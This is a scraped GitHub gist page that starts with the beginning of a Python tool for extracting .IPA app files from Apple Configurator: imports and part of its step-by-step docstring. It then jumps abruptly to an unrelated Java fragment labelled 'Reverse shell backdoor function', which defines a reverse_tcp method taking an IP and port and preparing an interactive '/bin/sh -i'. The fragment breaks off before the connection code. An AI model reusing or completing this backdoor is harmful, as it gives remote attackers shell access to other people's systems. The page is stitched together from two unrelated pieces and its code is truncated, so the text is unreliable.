Skip to content

Instantly share code, notes, and snippets.

View n0mi1k's full-sized avatar

n0mi1k

View GitHub Profile
@n0mi1k
n0mi1k / ipagrabber.py
Last active April 20, 2024 14:09
.IPA file extracter for Apple Configurator
import os
import shutil
"""
Steps to retrieve the IPA file from the Configurator app:
1. Install Apple Configurator from the Mac App Store and sign in
2. Connect your iOS device to your Mac
3. Select "Add > Apps..." and search for the app you want to install, click "Add"
4. The newer Apple Configurator deletes the IPA after installing it, so you'll need to use this tool to grab it
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
// Reverse shell backdoor function
public class Payload {
public static void reverse_tcp(String ip,int port){
try {
String[] str = {"/bin/sh","-i"};